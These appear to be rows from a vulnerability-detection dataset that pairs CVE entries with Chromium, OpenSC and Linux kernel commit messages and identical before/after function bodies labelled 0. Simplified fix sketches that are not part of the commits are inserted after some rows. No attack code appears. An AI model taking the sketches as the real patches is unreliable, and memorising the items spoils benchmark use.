CVE-2016-5200 | https://www.cvedetails.com/cve/CVE-2016-5200/ | CWE-119 | https://github.com/chromium/chromium/commit/2f19869af13bbfdcfd682a55c0d2c61c6e102475 | 2f19869af13bbfdcfd682a55c0d2c61c6e102475 | chrome/browser/ui/webauthn: long domains may cause a line break.
As requested by UX in [1], allow long host names to split a title into
two lines. This allows us to show more of the name before eliding,
although sufficiently long names will still trigger elision.
Screenshot at
https://drive.google.com/open?id=1_V6t2CeZDAVazy3Px-OET2LnB__aEW1r.
[1] https://docs.google.com/presentation/d/1TtxkPUchyVZulqgdMcfui-68B0W-DWaFFVJEffGIbLA/edit#slide=id.g5913c4105f_1_12
Change-Id: I70f6541e0db3e9942239304de43b487a7561ca34
Bug: 870892
Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1601812
Auto-Submit: Adam Langley <agl@chromium.org>
Commit-Queue: Nina Satragno <nsatragno@chromium.org>
Reviewed-by: Nina Satragno <nsatragno@chromium.org>
Cr-Commit-Position: refs/heads/master@{#658114} | const gfx::VectorIcon& AuthenticatorTimeoutErrorModel::GetStepIllustration(
ImageColorScheme color_scheme) const {
return color_scheme == ImageColorScheme::kDark ? kWebauthnErrorDarkIcon
: kWebauthnErrorIcon;
}
| const gfx::VectorIcon& AuthenticatorTimeoutErrorModel::GetStepIllustration(
ImageColorScheme color_scheme) const {
return color_scheme == ImageColorScheme::kDark ? kWebauthnErrorDarkIcon
: kWebauthnErrorIcon;
}
| C | Chrome | 0 |
CVE-2018-16427 | https://www.cvedetails.com/cve/CVE-2018-16427/ | CWE-125 | https://github.com/OpenSC/OpenSC/pull/1447/commits/8fe377e93b4b56060e5bbfb6f3142ceaeca744fa | 8fe377e93b4b56060e5bbfb6f3142ceaeca744fa | fixed out of bounds reads
Thanks to Eric Sesterhenn from X41 D-SEC GmbH
for reporting and suggesting security fixes. | static int coolkey_get_init_and_get_count(list_t *list, int *countp)
{
*countp = list_size(list);
list_iterator_start(list);
return SC_SUCCESS;
}
| static int coolkey_get_init_and_get_count(list_t *list, int *countp)
{
*countp = list_size(list);
list_iterator_start(list);
return SC_SUCCESS;
}
| C | OpenSC | 0 |
CVE-2013-1828 | https://www.cvedetails.com/cve/CVE-2013-1828/ | CWE-20 | https://github.com/torvalds/linux/commit/726bc6b092da4c093eb74d13c07184b18c1af0f1 | 726bc6b092da4c093eb74d13c07184b18c1af0f1 | net/sctp: Validate parameter size for SCTP_GET_ASSOC_STATS
Building sctp may fail with:
In function 'copy_from_user',
inlined from 'sctp_getsockopt_assoc_stats' at
net/sctp/socket.c:5656:20:
arch/x86/include/asm/uaccess_32.h:211:26: error: call to
'copy_from_user_overflow' declared with attribute error: copy_from_user()
buffer size is not provably correct
if built with W=1 due to a missing parameter size validation
before the call to copy_from_user.
Signed-off-by: Guenter Roeck <linux@roeck-us.net>
Acked-by: Vlad Yasevich <vyasevich@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | int sctp_inet_listen(struct socket *sock, int backlog)
{
struct sock *sk = sock->sk;
struct sctp_endpoint *ep = sctp_sk(sk)->ep;
int err = -EINVAL;
if (unlikely(backlog < 0))
return err;
sctp_lock_sock(sk);
/* Peeled-off sockets are not allowed to listen(). */
if (sctp_style(sk, UDP_HIGH_BANDWIDTH))
goto out;
if (sock->state != SS_UNCONNECTED)
goto out;
/* If backlog is zero, disable listening. */
if (!backlog) {
if (sctp_sstate(sk, CLOSED))
goto out;
err = 0;
sctp_unhash_endpoint(ep);
sk->sk_state = SCTP_SS_CLOSED;
if (sk->sk_reuse)
sctp_sk(sk)->bind_hash->fastreuse = 1;
goto out;
}
/* If we are already listening, just update the backlog */
if (sctp_sstate(sk, LISTENING))
sk->sk_max_ack_backlog = backlog;
else {
err = sctp_listen_start(sk, backlog);
if (err)
goto out;
}
err = 0;
out:
sctp_release_sock(sk);
return err;
}
| int sctp_inet_listen(struct socket *sock, int backlog)
{
struct sock *sk = sock->sk;
struct sctp_endpoint *ep = sctp_sk(sk)->ep;
int err = -EINVAL;
if (unlikely(backlog < 0))
return err;
sctp_lock_sock(sk);
/* Peeled-off sockets are not allowed to listen(). */
if (sctp_style(sk, UDP_HIGH_BANDWIDTH))
goto out;
if (sock->state != SS_UNCONNECTED)
goto out;
/* If backlog is zero, disable listening. */
if (!backlog) {
if (sctp_sstate(sk, CLOSED))
goto out;
err = 0;
sctp_unhash_endpoint(ep);
sk->sk_state = SCTP_SS_CLOSED;
if (sk->sk_reuse)
sctp_sk(sk)->bind_hash->fastreuse = 1;
goto out;
}
/* If we are already listening, just update the backlog */
if (sctp_sstate(sk, LISTENING))
sk->sk_max_ack_backlog = backlog;
else {
err = sctp_listen_start(sk, backlog);
if (err)
goto out;
}
err = 0;
out:
sctp_release_sock(sk);
return err;
}
| C | linux | 0 |
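The commit message above describes the actual fix — validate the user-supplied optlen in sctp_getsockopt_assoc_stats() before calling copy_from_user() — while the function shown is the unchanged sctp_inet_listen(). A hedged sketch of that validation, illustrative rather than the full getsockopt handler:
static int sctp_assoc_stats_len_check_sketch(char __user *optval, int len)
{
	struct sctp_assoc_stats sas;

	/* The caller must supply at least an association id. */
	if (len < sizeof(sctp_assoc_t))
		return -EINVAL;

	/* Allow the structure to grow without breaking older callers. */
	if (len > sizeof(sas))
		len = sizeof(sas);

	if (copy_from_user(&sas, optval, len))
		return -EFAULT;

	/* ... look up the association and fill in the statistics ... */
	return 0;
}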
CVE-2014-7145 | https://www.cvedetails.com/cve/CVE-2014-7145/ | CWE-399 | https://github.com/torvalds/linux/commit/18f39e7be0121317550d03e267e3ebd4dbfbb3ce | 18f39e7be0121317550d03e267e3ebd4dbfbb3ce | [CIFS] Possible null ptr deref in SMB2_tcon
As Raphael Geissert pointed out, tcon_error_exit can dereference tcon
and there is one path in which tcon can be null.
Signed-off-by: Steve French <smfrench@gmail.com>
CC: Stable <stable@vger.kernel.org> # v3.7+
Reported-by: Raphael Geissert <geissert@debian.org> | SMB2_query_directory(const unsigned int xid, struct cifs_tcon *tcon,
u64 persistent_fid, u64 volatile_fid, int index,
struct cifs_search_info *srch_inf)
{
struct smb2_query_directory_req *req;
struct smb2_query_directory_rsp *rsp = NULL;
struct kvec iov[2];
int rc = 0;
int len;
int resp_buftype;
unsigned char *bufptr;
struct TCP_Server_Info *server;
struct cifs_ses *ses = tcon->ses;
__le16 asteriks = cpu_to_le16('*');
char *end_of_smb;
unsigned int output_size = CIFSMaxBufSize;
size_t info_buf_size;
if (ses && (ses->server))
server = ses->server;
else
return -EIO;
rc = small_smb2_init(SMB2_QUERY_DIRECTORY, tcon, (void **) &req);
if (rc)
return rc;
switch (srch_inf->info_level) {
case SMB_FIND_FILE_DIRECTORY_INFO:
req->FileInformationClass = FILE_DIRECTORY_INFORMATION;
info_buf_size = sizeof(FILE_DIRECTORY_INFO) - 1;
break;
case SMB_FIND_FILE_ID_FULL_DIR_INFO:
req->FileInformationClass = FILEID_FULL_DIRECTORY_INFORMATION;
info_buf_size = sizeof(SEARCH_ID_FULL_DIR_INFO) - 1;
break;
default:
cifs_dbg(VFS, "info level %u isn't supported\n",
srch_inf->info_level);
rc = -EINVAL;
goto qdir_exit;
}
req->FileIndex = cpu_to_le32(index);
req->PersistentFileId = persistent_fid;
req->VolatileFileId = volatile_fid;
len = 0x2;
bufptr = req->Buffer;
memcpy(bufptr, &asteriks, len);
req->FileNameOffset =
cpu_to_le16(sizeof(struct smb2_query_directory_req) - 1 - 4);
req->FileNameLength = cpu_to_le16(len);
/*
* BB could be 30 bytes or so longer if we used SMB2 specific
* buffer lengths, but this is safe and close enough.
*/
output_size = min_t(unsigned int, output_size, server->maxBuf);
output_size = min_t(unsigned int, output_size, 2 << 15);
req->OutputBufferLength = cpu_to_le32(output_size);
iov[0].iov_base = (char *)req;
/* 4 for RFC1001 length and 1 for Buffer */
iov[0].iov_len = get_rfc1002_length(req) + 4 - 1;
iov[1].iov_base = (char *)(req->Buffer);
iov[1].iov_len = len;
inc_rfc1001_len(req, len - 1 /* Buffer */);
rc = SendReceive2(xid, ses, iov, 2, &resp_buftype, 0);
rsp = (struct smb2_query_directory_rsp *)iov[0].iov_base;
if (rc) {
cifs_stats_fail_inc(tcon, SMB2_QUERY_DIRECTORY_HE);
goto qdir_exit;
}
rc = validate_buf(le16_to_cpu(rsp->OutputBufferOffset),
le32_to_cpu(rsp->OutputBufferLength), &rsp->hdr,
info_buf_size);
if (rc)
goto qdir_exit;
srch_inf->unicode = true;
if (srch_inf->ntwrk_buf_start) {
if (srch_inf->smallBuf)
cifs_small_buf_release(srch_inf->ntwrk_buf_start);
else
cifs_buf_release(srch_inf->ntwrk_buf_start);
}
srch_inf->ntwrk_buf_start = (char *)rsp;
srch_inf->srch_entries_start = srch_inf->last_entry = 4 /* rfclen */ +
(char *)&rsp->hdr + le16_to_cpu(rsp->OutputBufferOffset);
/* 4 for rfc1002 length field */
end_of_smb = get_rfc1002_length(rsp) + 4 + (char *)&rsp->hdr;
srch_inf->entries_in_buffer =
num_entries(srch_inf->srch_entries_start, end_of_smb,
&srch_inf->last_entry, info_buf_size);
srch_inf->index_of_last_entry += srch_inf->entries_in_buffer;
cifs_dbg(FYI, "num entries %d last_index %lld srch start %p srch end %p\n",
srch_inf->entries_in_buffer, srch_inf->index_of_last_entry,
srch_inf->srch_entries_start, srch_inf->last_entry);
if (resp_buftype == CIFS_LARGE_BUFFER)
srch_inf->smallBuf = false;
else if (resp_buftype == CIFS_SMALL_BUFFER)
srch_inf->smallBuf = true;
else
cifs_dbg(VFS, "illegal search buffer type\n");
if (rsp->hdr.Status == STATUS_NO_MORE_FILES)
srch_inf->endOfSearch = 1;
else
srch_inf->endOfSearch = 0;
return rc;
qdir_exit:
free_rsp_buf(resp_buftype, rsp);
return rc;
}
| SMB2_query_directory(const unsigned int xid, struct cifs_tcon *tcon,
u64 persistent_fid, u64 volatile_fid, int index,
struct cifs_search_info *srch_inf)
{
struct smb2_query_directory_req *req;
struct smb2_query_directory_rsp *rsp = NULL;
struct kvec iov[2];
int rc = 0;
int len;
int resp_buftype;
unsigned char *bufptr;
struct TCP_Server_Info *server;
struct cifs_ses *ses = tcon->ses;
__le16 asteriks = cpu_to_le16('*');
char *end_of_smb;
unsigned int output_size = CIFSMaxBufSize;
size_t info_buf_size;
if (ses && (ses->server))
server = ses->server;
else
return -EIO;
rc = small_smb2_init(SMB2_QUERY_DIRECTORY, tcon, (void **) &req);
if (rc)
return rc;
switch (srch_inf->info_level) {
case SMB_FIND_FILE_DIRECTORY_INFO:
req->FileInformationClass = FILE_DIRECTORY_INFORMATION;
info_buf_size = sizeof(FILE_DIRECTORY_INFO) - 1;
break;
case SMB_FIND_FILE_ID_FULL_DIR_INFO:
req->FileInformationClass = FILEID_FULL_DIRECTORY_INFORMATION;
info_buf_size = sizeof(SEARCH_ID_FULL_DIR_INFO) - 1;
break;
default:
cifs_dbg(VFS, "info level %u isn't supported\n",
srch_inf->info_level);
rc = -EINVAL;
goto qdir_exit;
}
req->FileIndex = cpu_to_le32(index);
req->PersistentFileId = persistent_fid;
req->VolatileFileId = volatile_fid;
len = 0x2;
bufptr = req->Buffer;
memcpy(bufptr, &asteriks, len);
req->FileNameOffset =
cpu_to_le16(sizeof(struct smb2_query_directory_req) - 1 - 4);
req->FileNameLength = cpu_to_le16(len);
/*
* BB could be 30 bytes or so longer if we used SMB2 specific
* buffer lengths, but this is safe and close enough.
*/
output_size = min_t(unsigned int, output_size, server->maxBuf);
output_size = min_t(unsigned int, output_size, 2 << 15);
req->OutputBufferLength = cpu_to_le32(output_size);
iov[0].iov_base = (char *)req;
/* 4 for RFC1001 length and 1 for Buffer */
iov[0].iov_len = get_rfc1002_length(req) + 4 - 1;
iov[1].iov_base = (char *)(req->Buffer);
iov[1].iov_len = len;
inc_rfc1001_len(req, len - 1 /* Buffer */);
rc = SendReceive2(xid, ses, iov, 2, &resp_buftype, 0);
rsp = (struct smb2_query_directory_rsp *)iov[0].iov_base;
if (rc) {
cifs_stats_fail_inc(tcon, SMB2_QUERY_DIRECTORY_HE);
goto qdir_exit;
}
rc = validate_buf(le16_to_cpu(rsp->OutputBufferOffset),
le32_to_cpu(rsp->OutputBufferLength), &rsp->hdr,
info_buf_size);
if (rc)
goto qdir_exit;
srch_inf->unicode = true;
if (srch_inf->ntwrk_buf_start) {
if (srch_inf->smallBuf)
cifs_small_buf_release(srch_inf->ntwrk_buf_start);
else
cifs_buf_release(srch_inf->ntwrk_buf_start);
}
srch_inf->ntwrk_buf_start = (char *)rsp;
srch_inf->srch_entries_start = srch_inf->last_entry = 4 /* rfclen */ +
(char *)&rsp->hdr + le16_to_cpu(rsp->OutputBufferOffset);
/* 4 for rfc1002 length field */
end_of_smb = get_rfc1002_length(rsp) + 4 + (char *)&rsp->hdr;
srch_inf->entries_in_buffer =
num_entries(srch_inf->srch_entries_start, end_of_smb,
&srch_inf->last_entry, info_buf_size);
srch_inf->index_of_last_entry += srch_inf->entries_in_buffer;
cifs_dbg(FYI, "num entries %d last_index %lld srch start %p srch end %p\n",
srch_inf->entries_in_buffer, srch_inf->index_of_last_entry,
srch_inf->srch_entries_start, srch_inf->last_entry);
if (resp_buftype == CIFS_LARGE_BUFFER)
srch_inf->smallBuf = false;
else if (resp_buftype == CIFS_SMALL_BUFFER)
srch_inf->smallBuf = true;
else
cifs_dbg(VFS, "illegal search buffer type\n");
if (rsp->hdr.Status == STATUS_NO_MORE_FILES)
srch_inf->endOfSearch = 1;
else
srch_inf->endOfSearch = 0;
return rc;
qdir_exit:
free_rsp_buf(resp_buftype, rsp);
return rc;
}
| C | linux | 0 |
CVE-2011-1019 | https://www.cvedetails.com/cve/CVE-2011-1019/ | CWE-264 | https://github.com/torvalds/linux/commit/8909c9ad8ff03611c9c96c9a92656213e4bb495b | 8909c9ad8ff03611c9c96c9a92656213e4bb495b | net: don't allow CAP_NET_ADMIN to load non-netdev kernel modules
Since a8f80e8ff94ecba629542d9b4b5f5a8ee3eb565c any process with
CAP_NET_ADMIN may load any module from /lib/modules/. This doesn't mean
that CAP_NET_ADMIN is a superset of CAP_SYS_MODULE as modules are
limited to /lib/modules/**. However, CAP_NET_ADMIN capability shouldn't
allow anybody load any module not related to networking.
This patch restricts an ability of autoloading modules to netdev modules
with explicit aliases. This fixes CVE-2011-1019.
Arnd Bergmann suggested to leave untouched the old pre-v2.6.32 behavior
of loading netdev modules by name (without any prefix) for processes
with CAP_SYS_MODULE to maintain the compatibility with network scripts
that use autoloading netdev modules by aliases like "eth0", "wlan0".
Currently there are only three users of the feature in the upstream
kernel: ipip, ip_gre and sit.
root@albatros:~# capsh --drop=$(seq -s, 0 11),$(seq -s, 13 34) --
root@albatros:~# grep Cap /proc/$$/status
CapInh: 0000000000000000
CapPrm: fffffff800001000
CapEff: fffffff800001000
CapBnd: fffffff800001000
root@albatros:~# modprobe xfs
FATAL: Error inserting xfs
(/lib/modules/2.6.38-rc6-00001-g2bf4ca3/kernel/fs/xfs/xfs.ko): Operation not permitted
root@albatros:~# lsmod | grep xfs
root@albatros:~# ifconfig xfs
xfs: error fetching interface information: Device not found
root@albatros:~# lsmod | grep xfs
root@albatros:~# lsmod | grep sit
root@albatros:~# ifconfig sit
sit: error fetching interface information: Device not found
root@albatros:~# lsmod | grep sit
root@albatros:~# ifconfig sit0
sit0 Link encap:IPv6-in-IPv4
NOARP MTU:1480 Metric:1
root@albatros:~# lsmod | grep sit
sit 10457 0
tunnel4 2957 1 sit
For CAP_SYS_MODULE module loading is still relaxed:
root@albatros:~# grep Cap /proc/$$/status
CapInh: 0000000000000000
CapPrm: ffffffffffffffff
CapEff: ffffffffffffffff
CapBnd: ffffffffffffffff
root@albatros:~# ifconfig xfs
xfs: error fetching interface information: Device not found
root@albatros:~# lsmod | grep xfs
xfs 745319 0
Reference: https://lkml.org/lkml/2011/2/24/203
Signed-off-by: Vasiliy Kulikov <segoon@openwall.com>
Signed-off-by: Michael Tokarev <mjt@tls.msk.ru>
Acked-by: David S. Miller <davem@davemloft.net>
Acked-by: Kees Cook <kees.cook@canonical.com>
Signed-off-by: James Morris <jmorris@namei.org> | void __dev_remove_pack(struct packet_type *pt)
{
struct list_head *head = ptype_head(pt);
struct packet_type *pt1;
spin_lock(&ptype_lock);
list_for_each_entry(pt1, head, list) {
if (pt == pt1) {
list_del_rcu(&pt->list);
goto out;
}
}
printk(KERN_WARNING "dev_remove_pack: %p not found.\n", pt);
out:
spin_unlock(&ptype_lock);
}
| void __dev_remove_pack(struct packet_type *pt)
{
struct list_head *head = ptype_head(pt);
struct packet_type *pt1;
spin_lock(&ptype_lock);
list_for_each_entry(pt1, head, list) {
if (pt == pt1) {
list_del_rcu(&pt->list);
goto out;
}
}
printk(KERN_WARNING "dev_remove_pack: %p not found.\n", pt);
out:
spin_unlock(&ptype_lock);
}
| C | linux | 0 |
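The CAP_NET_ADMIN record above explains the new module-loading policy in prose and shell transcripts; the function shown (__dev_remove_pack) is unrelated. A hedged sketch of the dev_load()-style logic the message describes — simplified, not the actual patch:
static void dev_load_sketch(struct net *net, const char *name)
{
	struct net_device *dev;

	rcu_read_lock();
	dev = dev_get_by_name_rcu(net, name);
	rcu_read_unlock();

	if (dev)
		return;				/* device already exists */

	/* CAP_NET_ADMIN may only pull in modules that opted in with an
	 * explicit "netdev-<name>" alias. */
	if (capable(CAP_NET_ADMIN) && request_module("netdev-%s", name) == 0)
		return;

	/* The old by-name autoload survives for CAP_SYS_MODULE holders,
	 * keeping scripts that configure eth0/wlan0/sit0 by name working. */
	if (capable(CAP_SYS_MODULE))
		request_module("%s", name);
}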
CVE-2018-6033 | https://www.cvedetails.com/cve/CVE-2018-6033/ | CWE-20 | https://github.com/chromium/chromium/commit/a8d6ae61d266d8bc44c3dd2d08bda32db701e359 | a8d6ae61d266d8bc44c3dd2d08bda32db701e359 | Downloads : Fixed an issue of opening incorrect download file
When one download overwrites another completed download, calling download.open in the old download causes the new download to open, which could be dangerous and undesirable. In this CL, we are trying to avoid this by blocking the opening of the old download.
Bug: 793620
Change-Id: Ic948175756700ad7c08489c3cc347330daedb6f8
Reviewed-on: https://chromium-review.googlesource.com/826477
Reviewed-by: David Trainor <dtrainor@chromium.org>
Reviewed-by: Xing Liu <xingliu@chromium.org>
Reviewed-by: John Abd-El-Malek <jam@chromium.org>
Commit-Queue: Shakti Sahu <shaktisahu@chromium.org>
Cr-Commit-Position: refs/heads/master@{#525810} | void DownloadItemImpl::Start(
std::unique_ptr<DownloadFile> file,
std::unique_ptr<DownloadRequestHandleInterface> req_handle,
const DownloadCreateInfo& new_create_info) {
DCHECK_CURRENTLY_ON(BrowserThread::UI);
DCHECK(!download_file_.get());
DVLOG(20) << __func__ << "() this=" << DebugString(true);
RecordDownloadCount(START_COUNT);
download_file_ = std::move(file);
job_ = DownloadJobFactory::CreateJob(this, std::move(req_handle),
new_create_info, false);
if (job_->IsParallelizable()) {
RecordParallelizableDownloadCount(START_COUNT, IsParallelDownloadEnabled());
}
deferred_interrupt_reason_ = DOWNLOAD_INTERRUPT_REASON_NONE;
if (state_ == CANCELLED_INTERNAL) {
ReleaseDownloadFile(true);
job_->Cancel(true);
return;
}
DCHECK(state_ == INITIAL_INTERNAL || state_ == RESUMING_INTERNAL);
DCHECK(state_ != INITIAL_INTERNAL || GetTargetFilePath().empty());
if (new_create_info.result != DOWNLOAD_INTERRUPT_REASON_NONE) {
DCHECK(!download_file_.get());
DCHECK(new_create_info.save_info);
int64_t offset = new_create_info.save_info->offset;
std::unique_ptr<crypto::SecureHash> hash_state =
new_create_info.save_info->hash_state
? new_create_info.save_info->hash_state->Clone()
: nullptr;
destination_info_.received_bytes = offset;
hash_state_ = std::move(hash_state);
destination_info_.hash.clear();
deferred_interrupt_reason_ = new_create_info.result;
received_slices_.clear();
TransitionTo(INTERRUPTED_TARGET_PENDING_INTERNAL);
DetermineDownloadTarget();
return;
}
if (state_ == INITIAL_INTERNAL) {
RecordDownloadCount(NEW_DOWNLOAD_COUNT);
if (job_->IsParallelizable()) {
RecordParallelizableDownloadCount(NEW_DOWNLOAD_COUNT,
IsParallelDownloadEnabled());
}
RecordDownloadMimeType(mime_type_);
if (!GetBrowserContext()->IsOffTheRecord()) {
RecordDownloadCount(NEW_DOWNLOAD_COUNT_NORMAL_PROFILE);
RecordDownloadMimeTypeForNormalProfile(mime_type_);
}
}
DCHECK(download_file_);
DCHECK(job_);
if (state_ == RESUMING_INTERNAL)
UpdateValidatorsOnResumption(new_create_info);
if (!job_->IsParallelizable() && !received_slices_.empty()) {
destination_info_.received_bytes =
GetMaxContiguousDataBlockSizeFromBeginning(received_slices_);
received_slices_.clear();
}
TransitionTo(TARGET_PENDING_INTERNAL);
job_->Start(download_file_.get(),
base::Bind(&DownloadItemImpl::OnDownloadFileInitialized,
weak_ptr_factory_.GetWeakPtr()),
GetReceivedSlices());
}
| void DownloadItemImpl::Start(
std::unique_ptr<DownloadFile> file,
std::unique_ptr<DownloadRequestHandleInterface> req_handle,
const DownloadCreateInfo& new_create_info) {
DCHECK_CURRENTLY_ON(BrowserThread::UI);
DCHECK(!download_file_.get());
DVLOG(20) << __func__ << "() this=" << DebugString(true);
RecordDownloadCount(START_COUNT);
download_file_ = std::move(file);
job_ = DownloadJobFactory::CreateJob(this, std::move(req_handle),
new_create_info, false);
if (job_->IsParallelizable()) {
RecordParallelizableDownloadCount(START_COUNT, IsParallelDownloadEnabled());
}
deferred_interrupt_reason_ = DOWNLOAD_INTERRUPT_REASON_NONE;
if (state_ == CANCELLED_INTERNAL) {
ReleaseDownloadFile(true);
job_->Cancel(true);
return;
}
DCHECK(state_ == INITIAL_INTERNAL || state_ == RESUMING_INTERNAL);
DCHECK(state_ != INITIAL_INTERNAL || GetTargetFilePath().empty());
if (new_create_info.result != DOWNLOAD_INTERRUPT_REASON_NONE) {
DCHECK(!download_file_.get());
DCHECK(new_create_info.save_info);
int64_t offset = new_create_info.save_info->offset;
std::unique_ptr<crypto::SecureHash> hash_state =
new_create_info.save_info->hash_state
? new_create_info.save_info->hash_state->Clone()
: nullptr;
destination_info_.received_bytes = offset;
hash_state_ = std::move(hash_state);
destination_info_.hash.clear();
deferred_interrupt_reason_ = new_create_info.result;
received_slices_.clear();
TransitionTo(INTERRUPTED_TARGET_PENDING_INTERNAL);
DetermineDownloadTarget();
return;
}
if (state_ == INITIAL_INTERNAL) {
RecordDownloadCount(NEW_DOWNLOAD_COUNT);
if (job_->IsParallelizable()) {
RecordParallelizableDownloadCount(NEW_DOWNLOAD_COUNT,
IsParallelDownloadEnabled());
}
RecordDownloadMimeType(mime_type_);
if (!GetBrowserContext()->IsOffTheRecord()) {
RecordDownloadCount(NEW_DOWNLOAD_COUNT_NORMAL_PROFILE);
RecordDownloadMimeTypeForNormalProfile(mime_type_);
}
}
DCHECK(download_file_);
DCHECK(job_);
if (state_ == RESUMING_INTERNAL)
UpdateValidatorsOnResumption(new_create_info);
if (!job_->IsParallelizable() && !received_slices_.empty()) {
destination_info_.received_bytes =
GetMaxContiguousDataBlockSizeFromBeginning(received_slices_);
received_slices_.clear();
}
TransitionTo(TARGET_PENDING_INTERNAL);
job_->Start(download_file_.get(),
base::Bind(&DownloadItemImpl::OnDownloadFileInitialized,
weak_ptr_factory_.GetWeakPtr()),
GetReceivedSlices());
}
| C | Chrome | 0 |
CVE-2018-16073 | https://www.cvedetails.com/cve/CVE-2018-16073/ | CWE-285 | https://github.com/chromium/chromium/commit/0bb3f5c715eb66bb5c1fb05fd81d902ca57f33ca | 0bb3f5c715eb66bb5c1fb05fd81d902ca57f33ca | Use unique processes for data URLs on restore.
Data URLs are usually put into the process that created them, but this
info is not tracked after a tab restore. Ensure that they do not end up
in the parent frame's process (or each other's process), in case they
are malicious.
BUG=863069
Change-Id: Ib391f90c7bdf28a0a9c057c5cc7918c10aed968b
Reviewed-on: https://chromium-review.googlesource.com/1150767
Reviewed-by: Alex Moshchuk <alexmos@chromium.org>
Reviewed-by: Lei Zhang <thestig@chromium.org>
Commit-Queue: Charlie Reis <creis@chromium.org>
Cr-Commit-Position: refs/heads/master@{#581023} | bool RenderFrameHostManager::ReinitializeRenderFrame(
RenderFrameHostImpl* render_frame_host) {
DCHECK(!render_frame_host->IsRenderFrameLive());
CreateOpenerProxies(render_frame_host->GetSiteInstance(), frame_tree_node_);
if (!frame_tree_node_->parent()) {
DCHECK(!GetRenderFrameProxyHost(render_frame_host->GetSiteInstance()));
if (!InitRenderView(render_frame_host->render_view_host(), nullptr))
return false;
} else {
if (!InitRenderFrame(render_frame_host))
return false;
RenderFrameProxyHost* proxy_to_parent = GetProxyToParent();
if (proxy_to_parent) {
const gfx::Size* size = render_frame_host->frame_size()
? &*render_frame_host->frame_size()
: nullptr;
GetProxyToParent()->SetChildRWHView(render_frame_host->GetView(), size);
}
}
DCHECK(render_frame_host->IsRenderFrameLive());
return true;
}
| bool RenderFrameHostManager::ReinitializeRenderFrame(
RenderFrameHostImpl* render_frame_host) {
DCHECK(!render_frame_host->IsRenderFrameLive());
CreateOpenerProxies(render_frame_host->GetSiteInstance(), frame_tree_node_);
if (!frame_tree_node_->parent()) {
DCHECK(!GetRenderFrameProxyHost(render_frame_host->GetSiteInstance()));
if (!InitRenderView(render_frame_host->render_view_host(), nullptr))
return false;
} else {
if (!InitRenderFrame(render_frame_host))
return false;
RenderFrameProxyHost* proxy_to_parent = GetProxyToParent();
if (proxy_to_parent) {
const gfx::Size* size = render_frame_host->frame_size()
? &*render_frame_host->frame_size()
: nullptr;
GetProxyToParent()->SetChildRWHView(render_frame_host->GetView(), size);
}
}
DCHECK(render_frame_host->IsRenderFrameLive());
return true;
}
| C | Chrome | 0 |
CVE-2012-2880 | https://www.cvedetails.com/cve/CVE-2012-2880/ | CWE-362 | https://github.com/chromium/chromium/commit/fcd3a7a671ecf2d5f46ea34787d27507a914d2f5 | fcd3a7a671ecf2d5f46ea34787d27507a914d2f5 | [Sync] Cleanup all tab sync enabling logic now that its on by default.
BUG=none
TEST=
Review URL: https://chromiumcodereview.appspot.com/10443046
git-svn-id: svn://svn.chromium.org/chrome/trunk/src@139462 0039d316-1c4b-4281-b951-d872f2087c98 | void SyncTest::SetProxyConfig(net::URLRequestContextGetter* context_getter,
const net::ProxyConfig& proxy_config) {
base::WaitableEvent done(false, false);
BrowserThread::PostTask(
BrowserThread::IO, FROM_HERE,
base::Bind(&SetProxyConfigCallback, &done,
make_scoped_refptr(context_getter), proxy_config));
done.Wait();
}
| void SyncTest::SetProxyConfig(net::URLRequestContextGetter* context_getter,
const net::ProxyConfig& proxy_config) {
base::WaitableEvent done(false, false);
BrowserThread::PostTask(
BrowserThread::IO, FROM_HERE,
base::Bind(&SetProxyConfigCallback, &done,
make_scoped_refptr(context_getter), proxy_config));
done.Wait();
}
| C | Chrome | 0 |
CVE-2016-5194 | null | null | https://github.com/chromium/chromium/commit/d4e0a7273cd8d7a9ee667ad5b5c8aad0f5f59251 | d4e0a7273cd8d7a9ee667ad5b5c8aad0f5f59251 | Clear Shill stub config in offline file manager tests
The Shill stub client fakes ethernet and wifi connections during
testing. Clear its config during offline tests to simulate a lack of
network connectivity.
As a side effect, fileManagerPrivate.getDriveConnectionState will no
longer need to be stubbed out, as it will now think the device is
offline and return the appropriate result.
Bug: 925272
Change-Id: Idd6cb44325cfde4991d3b1e64185a28e8655c733
Reviewed-on: https://chromium-review.googlesource.com/c/chromium/src/+/1578149
Commit-Queue: Austin Tankiang <austinct@chromium.org>
Reviewed-by: Sam McNally <sammc@chromium.org>
Cr-Commit-Position: refs/heads/master@{#654782} | RemovableTestVolume(const std::string& name,
VolumeType volume_type,
chromeos::DeviceType device_type,
const base::FilePath& device_path,
const std::string& drive_label)
: LocalTestVolume(name),
volume_type_(volume_type),
device_type_(device_type),
device_path_(device_path),
drive_label_(drive_label) {}
| RemovableTestVolume(const std::string& name,
VolumeType volume_type,
chromeos::DeviceType device_type,
const base::FilePath& device_path,
const std::string& drive_label)
: LocalTestVolume(name),
volume_type_(volume_type),
device_type_(device_type),
device_path_(device_path),
drive_label_(drive_label) {}
| C | Chrome | 0 |
CVE-2016-1667 | https://www.cvedetails.com/cve/CVE-2016-1667/ | CWE-284 | https://github.com/chromium/chromium/commit/350f7d4b2c76950c8e7271284de84a9756b796e1 | 350f7d4b2c76950c8e7271284de84a9756b796e1 | P2PQuicStream write functionality.
This adds the P2PQuicStream::WriteData function and adds tests. It also
adds the concept of a write buffered amount, enforcing this at the
P2PQuicStreamImpl.
Bug: 874296
Change-Id: Id02c8aa8d5368a87bb24a2e50dab5ef94bcae131
Reviewed-on: https://chromium-review.googlesource.com/c/1315534
Commit-Queue: Seth Hampson <shampson@chromium.org>
Reviewed-by: Henrik Boström <hbos@chromium.org>
Cr-Commit-Position: refs/heads/master@{#605766} | void DisconnectPeerTransport(FakePacketTransport* peer_packet_transport) {
DCHECK(peer_packet_transport_ == peer_packet_transport);
peer_packet_transport_ = nullptr;
}
| void DisconnectPeerTransport(FakePacketTransport* peer_packet_transport) {
DCHECK(peer_packet_transport_ == peer_packet_transport);
peer_packet_transport_ = nullptr;
}
| C | Chrome | 0 |
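The P2PQuicStream record above mentions a new write-buffered-amount limit enforced in P2PQuicStreamImpl, but the function shown is a test helper. A hedged sketch of such a guard — class-free, with invented names, and not the actual WriteData() implementation:
// Returns false when accepting |data_size| bytes would exceed the cap.
bool WriteWithBufferCapSketch(size_t data_size, size_t* buffered_amount,
                              size_t max_buffered_amount) {
  if (*buffered_amount > max_buffered_amount ||
      data_size > max_buffered_amount - *buffered_amount)
    return false;  // caller must back off until buffered data drains
  *buffered_amount += data_size;
  // ... hand the bytes to the underlying QUIC stream here ...
  return true;
}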
